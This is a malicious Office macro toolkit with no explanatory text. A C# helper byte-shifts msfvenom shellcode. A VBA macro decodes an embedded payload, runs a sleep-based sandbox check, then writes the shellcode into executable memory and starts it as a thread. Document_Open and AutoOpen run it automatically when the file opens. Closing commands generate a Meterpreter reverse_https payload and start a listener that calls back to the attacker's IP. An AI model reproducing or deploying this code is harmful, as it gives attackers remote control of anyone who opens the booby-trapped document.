using System;
using System.Text;
namespace HelperVBA
{
class Program
{
static void Main(string[] args)
{
byte[] buf = new byte[<msfvenom_csharp>] {<msfvenom_csharp>};
byte[] encoded = new byte[buf.Length];
for (int i = 0; i < buf.Length; i++)
{
encoded[i] = (byte)(((uint)buf[i] + 2) & 0xFF);
}
uint counter = 0;
StringBuilder hex = new StringBuilder(encoded.Length * 2);
foreach (byte b in encoded)
{
hex.AppendFormat("{0:D}, ", b);
counter++;
if (counter % 50 == 0)
{
hex.AppendFormat("_{0}", Environment.NewLine);
}
}
Console.WriteLine("The payload is: " + hex.ToString());
}
}
}
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long
Function MyMacro()
Dim buf As Variant
Dim addr As LongPtr
Dim counter As Long
Dim data As Long
Dim res As Long
Dim t1 As Date
Dim t2 As Date
Dim time As Long
t1 = Now()
Sleep (2000)
t2 = Now()
time = DateDiff("s", t1, t2)
If time < 2 Then
Exit Function
End If
buf = Array(254, 74, 133, 230, 242, 234, 206, 2, 2, 2, 67, 83, 67, 82, 84, 83, 88, 74, 51, 212, 103, 74, 141, 84, 98, 74, 141, 84, 26, 74, 141, 84, 34, 74, 141, 116, 82, 79, 51, 203, 74, 17, 185, 76, 76, 74, 51, 194, 174, 62, _
99, 126, 4, 46, 34, 67, 195, 203, 15, 67, 3, 195, 228, 239, 84, 74, 141, 84, 34, 141, 68, 62, 74, 3, 210, 67, 83, 104, 131, 122, 26, 13, 4, 17, 135, 116, 2, 2, 2, 141, 130, 138, 2, 2, 2, 74, 135, 194, 118, 105, _
74, 3, 210, 82, 70, 141, 66, 34, 75, 3, 210, 141, 74, 26, 229, 88, 74, 1, 203, 67, 141, 54, 138, 79, 51, 203, 74, 3, 216, 74, 51, 194, 67, 195, 203, 15, 174, 67, 3, 195, 58, 226, 119, 243, 78, 5, 78, 38, 10, 71, _
59, 211, 119, 218, 90, 70, 141, 66, 38, 75, 3, 210, 104, 67, 141, 14, 74, 70, 141, 66, 30, 75, 3, 210, 67, 141, 6, 138, 67, 90, 67, 90, 96, 91, 74, 3, 210, 92, 67, 90, 67, 91, 67, 92, 74, 133, 238, 34, 67, 84, _
1, 226, 90, 67, 91, 92, 74, 141, 20, 235, 77, 1, 1, 1, 95, 74, 51, 221, 85, 75, 192, 121, 107, 112, 107, 112, 103, 118, 2, 67, 88, 74, 139, 227, 75, 201, 196, 78, 121, 40, 9, 1, 215, 85, 85, 74, 139, 227, 85, 92, _
79, 51, 194, 79, 51, 203, 85, 85, 75, 188, 60, 88, 123, 169, 2, 2, 2, 2, 1, 215, 234, 17, 2, 2, 2, 51, 59, 52, 48, 51, 56, 58, 48, 54, 55, 48, 52, 53, 57, 2, 92, 74, 139, 195, 75, 201, 194, 189, 3, 2, _
2, 79, 51, 203, 85, 85, 108, 5, 85, 75, 188, 89, 139, 161, 200, 2, 2, 2, 2, 1, 215, 234, 89, 2, 2, 2, 49, 73, 56, 58, 116, 114, 101, 71, 111, 79, 76, 84, 107, 113, 52, 81, 106, 68, 50, 97, 119, 85, 67, 114, _
109, 124, 120, 112, 82, 79, 124, 72, 67, 86, 58, 73, 59, 117, 74, 47, 119, 82, 83, 113, 111, 91, 92, 107, 114, 87, 50, 102, 52, 97, 123, 120, 90, 121, 76, 121, 103, 87, 56, 111, 88, 123, 70, 83, 113, 82, 82, 47, 52, 118, _
90, 120, 79, 117, 77, 53, 108, 55, 124, 117, 121, 58, 2, 74, 139, 195, 85, 92, 67, 90, 79, 51, 203, 85, 74, 186, 2, 52, 170, 134, 2, 2, 2, 2, 82, 85, 85, 75, 201, 196, 237, 87, 48, 61, 1, 215, 74, 139, 200, 108, _
12, 97, 74, 139, 243, 108, 33, 92, 84, 106, 130, 53, 2, 2, 75, 139, 226, 108, 6, 67, 91, 75, 188, 119, 72, 160, 136, 2, 2, 2, 2, 1, 215, 79, 51, 194, 85, 92, 74, 139, 243, 79, 51, 203, 79, 51, 203, 85, 85, 75, _
201, 196, 47, 8, 26, 125, 1, 215, 135, 194, 119, 33, 74, 201, 195, 138, 21, 2, 2, 75, 188, 70, 242, 55, 226, 2, 2, 2, 2, 1, 215, 74, 1, 209, 118, 4, 237, 172, 234, 87, 2, 2, 2, 85, 91, 108, 66, 92, 75, 139, _
211, 195, 228, 18, 75, 201, 194, 2, 18, 2, 2, 75, 188, 90, 166, 85, 231, 2, 2, 2, 2, 1, 215, 74, 149, 85, 85, 74, 139, 233, 74, 139, 243, 74, 139, 220, 75, 201, 194, 2, 34, 2, 2, 75, 139, 251, 75, 188, 20, 152, _
139, 228, 2, 2, 2, 2, 1, 215, 74, 133, 198, 34, 135, 194, 118, 180, 104, 141, 9, 74, 3, 197, 135, 194, 119, 212, 90, 197, 90, 108, 2, 91, 75, 201, 196, 242, 183, 164, 88, 1, 215)
For i = 0 To UBound(buf)
buf(i) = buf(i) - 2
Next i
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
For counter = LBound(buf) To UBound(buf)
data = buf(counter)
res = RtlMoveMemory(addr + counter, data, 1)
Next counter
res = CreateThread(0, 0, addr, 0, 0, 0)
End Function
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
sudo msfvenom -p windows/x86/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f exe -o msfstaged.exe
sudo msfconsole -q -x "use windows/x86/meterpreter/reverse_https; set LHOST 10.0.0.241; set LPORT 443; exploit"